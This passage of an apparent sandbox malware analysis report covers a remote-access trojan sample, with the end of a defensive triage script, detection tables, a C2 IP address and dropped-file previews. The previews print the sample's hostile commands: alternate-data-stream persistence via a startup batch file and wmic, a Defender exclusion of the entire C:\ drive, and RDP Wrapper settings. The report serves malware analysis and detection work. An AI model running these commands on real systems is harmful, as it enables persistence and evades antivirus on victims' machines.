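        ForEach-Object { $findings.Add("NET       PID $($_.OwningProcess) -> $($_.RemoteAddress):$($_.RemotePort) $($_.State)") }

    return $findings
}

Invoke-AveMariaTriage | ForEach-Object { Write-Output $_ }
```

The hash table deliberately uses the report's own values: the two UPX copies the sample writes (C:\ProgramData\images.exe and the C:\ProgramData:ApplicationData stream) share the submitted file's SHA-256, so a match there confirms this exact build rather than a relative. A host that returns an empty list is not cleared, only free of these particular artifacts; the C2 address and file names are trivially changed between builds, whereas the ADS-on-startup-folder and hidden-account patterns are worth keeping in a detection rule on their own.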

Initial sample
Source | Detection | Scanner | Label
SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | 24% | ReversingLabs | Win32.Trojan.Streamer
SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | 100% | Joe Sandbox ML |

Dropped files
Source | Detection | Scanner | Label
C:\Program Files\Microsoft DN1\sqlmap.dll | 100% | Avira | PUA/Remoteadmin.AR
C:\ProgramData:ApplicationData | 100% | Joe Sandbox ML |
C:\ProgramData\images.exe | 100% | Joe Sandbox ML |
C:\Program Files\Microsoft DN1\sqlmap.dll | 49% | Virustotal |
C:\Program Files\Microsoft DN1\sqlmap.dll | 20% | Metadefender |
C:\Program Files\Microsoft DN1\sqlmap.dll | 50% | ReversingLabs | Win64.PUA.Presenoker
C:\ProgramData:ApplicationData | 24% | ReversingLabs | Win32.Trojan.Streamer
C:\ProgramData\images.exe | 24% | ReversingLabs | Win32.Trojan.Streamer
Unpacked PE files
Source | Detection | Scanner | Label
0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.2d10000.3.unpack | 100% | Avira | TR/Redcap.ghjpt
0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.732e68.2.unpack | 100% | Avira | TR/Patched.Ren.Gen3
4.3.images.exe.732cb8.3.unpack | 100% | Avira | TR/Patched.Ren.Gen3
0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.unpack | 100% | Avira | TR/Patched.Ren.Gen3
4.0.images.exe.400000.2.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
4.0.images.exe.400000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.732e68.6.unpack | 100% | Avira | TR/Patched.Ren.Gen3
0.0.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
4.0.images.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
4.3.images.exe.732cb8.7.unpack | 100% | Avira | TR/Patched.Ren.Gen3
4.2.images.exe.22e053f.3.unpack | 100% | Avira | TR/Patched.Ren.Gen3
4.2.images.exe.2ce0000.4.unpack | 100% | Avira | TR/Redcap.ghjpt
4.0.images.exe.400000.3.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
4.2.images.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
Domains
No Antivirus matches

URLs
Source | Detection | Scanner | Label
http://stascorp.comDVarFileInfo$ | 0% | Avira URL Cloud | safe
http://www.microsoft. | 0% | URL Reputation | safe
http://crl.micro | 0% | URL Reputation | safe
http://crl.microsof | 0% | URL Reputation | safe
23.227.202.157 | 2% | Virustotal |
23.227.202.157 | 0% | Avira URL Cloud | safe
          No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
23.227.202.157 | true | Virustotal: 2%; Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://support.google.com/chrome/?p=plugin_flash | images.exe, 00000004.00000002.525619079.0000000004AE0000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://stascorp.comDVarFileInfo$ | sqlmap.dll.4.dr | false | Avira URL Cloud: safe | low
http://www.microsoft. | powershell.exe, 00000001.00000003.342861149.0000000008D06000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://crl.micro | powershell.exe, 00000006.00000003.407047557.00000000076DF000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://github.com/syohex/java-simple-mine-sweeperC: | SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe, 00000000.00000002.265319225.0000000002310000.00000040.00001000.00020000.00000000.sdmp; SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe, 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp; images.exe, 00000004.00000002.522785265.00000000022E0000.00000040.00001000.00020000.00000000.sdmp; images.exe, 00000004.00000002.523109048.0000000002CF4000.00000002.00001000.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000006.00000002.409620051.0000000004601000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000006.00000002.409298369.00000000044C1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.microsof | powershell.exe, 00000001.00000003.377239509.00000000075FB000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000001.00000003.384190535.00000000075FB000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://support.google.com/chrome/answer/6258784 | images.exe, 00000004.00000002.525619079.0000000004AE0000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/syohex/java-simple-mine-sweeper | SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | false | | high
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000006.00000002.409620051.0000000004601000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
23.227.202.157 | unknown | United States | 29802 | HVC-AS | true
                        Joe Sandbox Version:34.0.0 Boulder Opal
                        Analysis ID:631792
Start date and time:2022-05-22 12:32:06 +02:00
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 10m 9s
                        Hypervisor based Inspection enabled:false
                        Report type:light
                        Sample file name:SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.7507 (renamed file extension from 7507 to exe)
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:40
                        Number of new started drivers analysed:3
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal100.phis.troj.spyw.expl.evad.winEXE@18/18@0/1
                        EGA Information:
                        • Successful, ratio: 66.7%
                        HDC Information:
                        • Successful, ratio: 44.8% (good quality ratio 44.4%)
                        • Quality average: 86.8%
                        • Quality standard deviation: 21.1%
                        HCA Information:
                        • Successful, ratio: 94%
                        • Number of executed functions: 0
                        • Number of non-executed functions: 0
                        Cookbook Comments:
                        • Adjust boot time
                        • Enable AMSI
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                        • TCP Packets have been reduced to 100
                        • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, fs.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
• Execution Graph export aborted for target images.exe, PID 6516 because there are no executed functions
• Not all processes were analyzed; report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
Time | Type | Description
12:33:15 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\programs.bat
12:33:27 | API Interceptor | 1x Sleep call for process: WMIC.exe modified
12:33:28 | API Interceptor | 854x Sleep call for process: cmd.exe modified
12:33:44 | API Interceptor | 50x Sleep call for process: powershell.exe modified
                        Process:C:\ProgramData\images.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):253693
                        Entropy (8bit):5.4435816594509685
                        Encrypted:false
                        SSDEEP:768:NUiQVQpXQq4WDi9SUnpB8fbQnxJcy8RMFdKKb5x8Rr/d6gl/+f8jZ0ftlFi4x7Qc:WJ33L+MoIiG4IvREWddadl/FY
                        MD5:4997128EF0ECA4C4696BF4177FF3AFF5
                        SHA1:7DD50F7BE34F25D580378A84B8F11A08F7EE8D1F
                        SHA-256:C59A7CF7B08FA7F79C51CA9126300B32FCEECE6972A9E8837D384804FD613E24
                        SHA-512:70DABDCDAE178CFB3D22EE2B00EBB747D17504864E68550256C5EE74B8D17506F88C0F057C8B91E666146B6E758C6C10EEDC123C871E2203C2BF5F67BD05EC66
                        Malicious:false
                        Preview:; RDP Wrapper Library configuration..; Do not modify without special knowledge..; Edited by sebaxakerhtc....[Main]..Updated=2022-02-06..LogFile=\rdpwrap.txt..SLPolicyHookNT60=1..SLPolicyHookNT61=1....[SLPolicy]..TerminalServices-RemoteConnectionManager-AllowRemoteConnections=1..TerminalServices-RemoteConnectionManager-AllowMultipleSessions=1..TerminalServices-RemoteConnectionManager-AllowAppServerMode=1..TerminalServices-RemoteConnectionManager-AllowMultimon=1..TerminalServices-RemoteConnectionManager-MaxUserSessions=0..TerminalServices-RemoteConnectionManager-ce0ad219-4670-4988-98fb-89b14c2f072b-MaxSessions=0..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-MaxSessions=2..TerminalServices-RDP-7-Advanced-Compression-Allowed=1..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-LocalOnly=0..TerminalServices-RemoteConnectionManager-8dc86f1d-9969-4379-91c1-06fe1dc60575-MaxSessions=1000..TerminalServices-DeviceRedirection-Licenses-TS
                        Process:C:\ProgramData\images.exe
                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                        Category:dropped
                        Size (bytes):116736
                        Entropy (8bit):5.884975745255681
                        Encrypted:false
                        SSDEEP:3072:m3zxbyHM+TstVfFyov7je9LBMMmMJDOvYYVs:oMjTiVw2ve9LBMMpJsT
                        MD5:461ADE40B800AE80A40985594E1AC236
                        SHA1:B3892EEF846C044A2B0785D54A432B3E93A968C8
                        SHA-256:798AF20DB39280F90A1D35F2AC2C1D62124D1F5218A2A0FA29D87A13340BD3E4
                        SHA-512:421F9060C4B61FA6F4074508602A2639209032FD5DF5BFC702A159E3BAD5479684CCB3F6E02F3E38FB8DB53839CF3F41FE58A3ACAD6EC1199A48DC333B2D8A26
                        Malicious:true
                        Antivirus:
                        • Antivirus: Avira, Detection: 100%
                        • Antivirus: Virustotal, Detection: 49%, Browse
                        • Antivirus: Metadefender, Detection: 20%, Browse
                        • Antivirus: ReversingLabs, Detection: 50%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........N.rB/.!B/.!B/.!.~.!j/.!.~.!&/.!.~3!H/.!..'!G/.!B/.!./.!O}.!F/.!O}0!C/.!O}7!C/.!O}2!C/.!RichB/.!................PE..d...Z..T.........." .................Q....................................... ............`.........................................0...l.......<...................................................................`...p............ ...............................text............................... ..`.rdata..<.... ......................@..@.data....=..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................
                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe
                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                        Category:modified
                        Size (bytes):222720
                        Entropy (8bit):7.862505245807072
                        Encrypted:false
                        SSDEEP:6144:DcsB/VWq2pmz2WGO3LPJRWE/4F0xXKk7ETkFI49Poih:DciKMoO3LDn4uxXKk7FI4d
                        MD5:DABC6F0C75C134E5310BA3526ADBA833
                        SHA1:854EC103A64182C97E8F25E45DA04889DBBBF3FF
                        SHA-256:9F9BAE001065A649A78CE6DE997F160EF32D03A2C28F4633A8386F75C938CADF
                        SHA-512:C596890BF6062890483E9EE276C890B04396C8C6C758B318AB0D218C506AE362DB32E13FAF9691B2B96D5A4EDE03EE107C5B01714AB06C86C465EBD23326E877
                        Malicious:true
                        Antivirus:
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        • Antivirus: ReversingLabs, Detection: 24%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Y.........................................................................................1.......Y.............Rich............PE..L...3..b.................P... ......P;.......@....@..........................`............@.................................\N.......@..\....................P..(...........................L=......l=..............................................UPX0....................................UPX1.....P.......P..................@....rsrc.... ...@.......T..............@......................................................................................................................................................................................................................................................................................................................................................................3.95.UPX!....
                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe
                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                        Category:dropped
                        Size (bytes):222720
                        Entropy (8bit):7.862505245807072
                        Encrypted:false
                        SSDEEP:6144:DcsB/VWq2pmz2WGO3LPJRWE/4F0xXKk7ETkFI49Poih:DciKMoO3LDn4uxXKk7FI4d
                        MD5:DABC6F0C75C134E5310BA3526ADBA833
                        SHA1:854EC103A64182C97E8F25E45DA04889DBBBF3FF
                        SHA-256:9F9BAE001065A649A78CE6DE997F160EF32D03A2C28F4633A8386F75C938CADF
                        SHA-512:C596890BF6062890483E9EE276C890B04396C8C6C758B318AB0D218C506AE362DB32E13FAF9691B2B96D5A4EDE03EE107C5B01714AB06C86C465EBD23326E877
                        Malicious:true
                        Antivirus:
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        • Antivirus: ReversingLabs, Detection: 24%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Y.........................................................................................1.......Y.............Rich............PE..L...3..b.................P... ......P;.......@....@..........................`............@.................................\N.......@..\....................P..(...........................L=......l=..............................................UPX0....................................UPX1.....P.......P..................@....rsrc.... ...@.......T..............@......................................................................................................................................................................................................................................................................................................................................................................3.95.UPX!....
                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):26
                        Entropy (8bit):3.95006375643621
                        Encrypted:false
                        SSDEEP:3:ggPYV:rPYV
                        MD5:187F488E27DB4AF347237FE461A079AD
                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                        Malicious:true
                        Preview:[ZoneTransfer]....ZoneId=0
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):14734
                        Entropy (8bit):4.993014478972177
                        Encrypted:false
                        SSDEEP:384:wZvOdB8Ypib4JNXp59HopbjvwRjdvRlAYotiQ0HzAF8:UvOdB8YNNZjHopbjoRjdvRlAYotinHzr
                        MD5:C5A56B913DEEDCF5AE01A2D4F8AA69CE
                        SHA1:C91D19BFD666FDD02B0739893833D4E1C0316511
                        SHA-256:1C5C865E5A98F33E277A81FCDADFBAB1367176BA14F8590022F7E5880161C00D
                        SHA-512:1058802FCD54817359F84977DD26AD4399C572910E67114F70B024EBADDF4E35E6AFF6461F90356205228B4B860E69392ABC27D38E284176C699916039CFA5ED
                        Malicious:false
                        Preview:PSMODULECACHE......#y;...Q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitsTransfer\BitsTransfer.psd1........Start-BitsTransfer........Set-BitsTransfer........Get-BitsTransfer........Resume-BitsTransfer........Add-BitsFile........Suspend-BitsTransfer........Complete-BitsTransfer........Remove-BitsTransfer........-.^(...[...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\AppBackgroundTask\AppBackgroundTask.psd1....#...Set-AppBackgroundTaskResourcePolicy........Unregister-AppBackgroundTask........Get-AppBackgroundTask........tid........pfn........iru....%...Enable-AppBackgroundTaskDiagnosticLog........Start-AppBackgroundTask....&...Disable-AppBackgroundTaskDiagnosticLog.........w.e...a...C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Unregister-PackageSource........Save-Package........Install-PackageProvider........Find-PackageProvider........Install-Package........Get-PackageProvider........Get-Package........Unins
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):21524
                        Entropy (8bit):5.603674470472126
                        Encrypted:false
                        SSDEEP:384:itL6k0H6SVTDJ0Nr+RnYSBKnaul6GspE93G1u16zx5mHKHVY37bHjqIvUI++j/:r6gJlY4KaulKwG3xU+u7Lmly
                        MD5:1492AC13C2B1E111C5C1164CAC260A7A
                        SHA1:E674BAB629FFA7437600288ADA10F76C318C8BE4
                        SHA-256:7093EAF8B4AEF9C1537F6D8E33993183D70CB3E90820901A7253C8DC2BFF12FF
                        SHA-512:910A51D461442A23171DAA166446024609123C1521FDDDAE80966295FBAA04C6564404D9BDDC9A313E8E4F26B057315A709248F5B8621039B787EDE11C826FD3
                        Malicious:false
                        Preview:@...e.....................K.....N....................@..........H...............<@.^.L."My...::..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)P.......System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP...............-K..s.F..*.]`.,j.....(.Microsoft.PowerShell.Commands.ManagementT................7.,.fiD..............*.Microsoft.Management.Inf
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:U:U
                        MD5:C4CA4238A0B923820DCC509A6F75849B
                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                        Malicious:false
                        Preview:1
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:U:U
                        MD5:C4CA4238A0B923820DCC509A6F75849B
                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                        Malicious:false
                        Preview:1
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:U:U
                        MD5:C4CA4238A0B923820DCC509A6F75849B
                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                        Malicious:false
                        Preview:1
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:U:U
                        MD5:C4CA4238A0B923820DCC509A6F75849B
                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                        Malicious:false
                        Preview:1
                        Process:C:\ProgramData\images.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                        Category:dropped
                        Size (bytes):40960
                        Entropy (8bit):0.792852251086831
                        Encrypted:false
                        SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                        MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                        SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                        SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                        SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):140
                        Entropy (8bit):4.86129651314522
                        Encrypted:false
                        SSDEEP:3:QwZ2vOUrKaM6eNGRjDWXp5cViEaKC5SufyM1K/RFofD6tRQLRWLyLRHgn:QElPhxuWXp+NaZ5SuH1MUmt2FWLyS
                        MD5:C2E52EDB9BA6919C7D9F3CF0B88221E2
                        SHA1:9972112AF86B48E937E589E262D21BAD251A6010
                        SHA-256:FAE189421B6E7CC977F1D2A69D712C97B22E810B0AE3F2F4E258E1112694C560
                        SHA-512:FDDEDA3E5D597D086B9C4412621078B3D14B6624DF2B003CA3238E3BD03DE35AAF3E16F04339AC54B04A723F98E76F17D74263F7D1CCBCA92B6FD2C325014B3B
                        Malicious:true
                        Preview:for /F "usebackq tokens=*" %%A in ("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\programs.bat:start") do %%A
                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):59
                        Entropy (8bit):4.2659637614761765
                        Encrypted:false
                        SSDEEP:3:eGAjGJwbZkREfcjMGERMQhM:ZuGJwi8cwGj
                        MD5:579E29CEC6BDE04C5C074D8311D6B884
                        SHA1:2FDFD4C6B8EB43A4C6F4C0D3998E4A5364221DFF
                        SHA-256:65138897F467ADF9FE20594326D724D2CD5B437D9AACF5F83721AF340F70CE3C
                        SHA-512:4011A9FD58C1DC8AA3ED79589D7232BBD06EB3FB32513D3C5B59B740ED89FDC9CCC9F3291812AFFF2CD679820BCD940AE3A49E41EBCBE20413821ACAD7C5191D
                        Malicious:true
                        Preview:wmic process call create '"C:\ProgramData:ApplicationData"'
                        Process:C:\ProgramData\images.exe
                        File Type:ASCII text, with very long lines, with no line terminators
                        Category:dropped
                        Size (bytes):87165
                        Entropy (8bit):6.102565506017432
                        Encrypted:false
                        SSDEEP:1536:S9sfGRcZdJiXrXafIyYOetKdapZsyTwL3cDGOLN0nTwY/A3iuR+:SsfFcbXafIB0u1GOJmA3iuR+
                        MD5:CC02ABB348037609ED09EC9157D55234
                        SHA1:32411A59960ECF4D7434232194A5B3DB55817647
                        SHA-256:62E0236494260F5C9FFF1C4DBF1A57C66B28A5ABE1ACF21B26D08235C735C7D8
                        SHA-512:AC95705ED369D82B65200354E10875F6AD5EBC4E0F9FFC61AE6C45C32410B6F55D4C47B219BA4722B6E15C34AC57F91270581DB0A391711D70AF376170DE2A35
                        Malicious:false
                        Preview:{"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.601478090199719e+12,"network":1.601453434e+12,"ticks":826153657.0,"uncertainty":4457158.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245951016607996"},"plugins":{"metadata":{"adobe-flash-player":{"disp
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):5048
                        Entropy (8bit):5.391537877355324
                        Encrypted:false
                        SSDEEP:96:BZEh2N58qDo1ZiZDh2N58qDo1ZgM6UjZ1h2N58qDo1ZVFEEdZW:N8vd
                        MD5:6845E5380ACF1B628551D90AE54909EF
                        SHA1:B9C3A195360C41016D305960471481CA9DA3E94C
                        SHA-256:3DEDBC9EE9E3D116C54885B6DBA56C67ACB7442EDD6DEFE55C5FF1B497D33E0C
                        SHA-512:D9D9828E9A3426342ECAA3F9D2E4938DFC939B66BE9FDF358C4D5B0083AAFCE00729CE5160C9839E06F071C8DC459F01E14F5EFD01218A57EDA917CD9CB4DF5F
                        Malicious:false
                        Preview:.**********************..Windows PowerShell transcript start..Start time: 20220522123355..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 301389 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell Add-MpPreference -ExclusionPath C:\..Process ID: 6732..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220522123356..**********************..PS>Add-MpPreference -ExclusionPath C:\..**********************..Windows PowerShell transcript start..Start time: 20220522123738..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 301389 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell Add-MpPreference -Exclus
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):5048
                        Entropy (8bit):5.393687137718255
                        Encrypted:false
                        SSDEEP:96:BZ9h2N5dqDo1ZEZ6h2N5dqDo1ZQM6UjZoh2N5dqDo1ZFFEERZo:OINQ
                        MD5:CD40D7F27D7F40B312A0A16DBE7ACE72
                        SHA1:A66F76313958430BF10322D8428A43ACE8DDBF4E
                        SHA-256:C0A23C24DF8C9D780BD4D84A63AA4AD9AB61C416349B1E4A8F76087EE294A06A
                        SHA-512:A3920F40E3708648D47162DD70C400F2990150E68B4DBD7BFBCFAF95FDFC89D378FB479982EFBBAC9BE02E3E16D7C689569F831AC04F7E970FB64933C4DA7BF2
                        Malicious:false
                        Preview:.**********************..Windows PowerShell transcript start..Start time: 20220522123336..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 301389 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell Add-MpPreference -ExclusionPath C:\..Process ID: 6368..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220522123336..**********************..PS>Add-MpPreference -ExclusionPath C:\..**********************..Windows PowerShell transcript start..Start time: 20220522123656..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 301389 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell Add-MpPreference -Exclus
                        Process:C:\Windows\System32\wbem\WMIC.exe
                        File Type:ASCII text, with CRLF, CR line terminators
                        Category:dropped
                        Size (bytes):140
                        Entropy (8bit):5.001523394375711
                        Encrypted:false
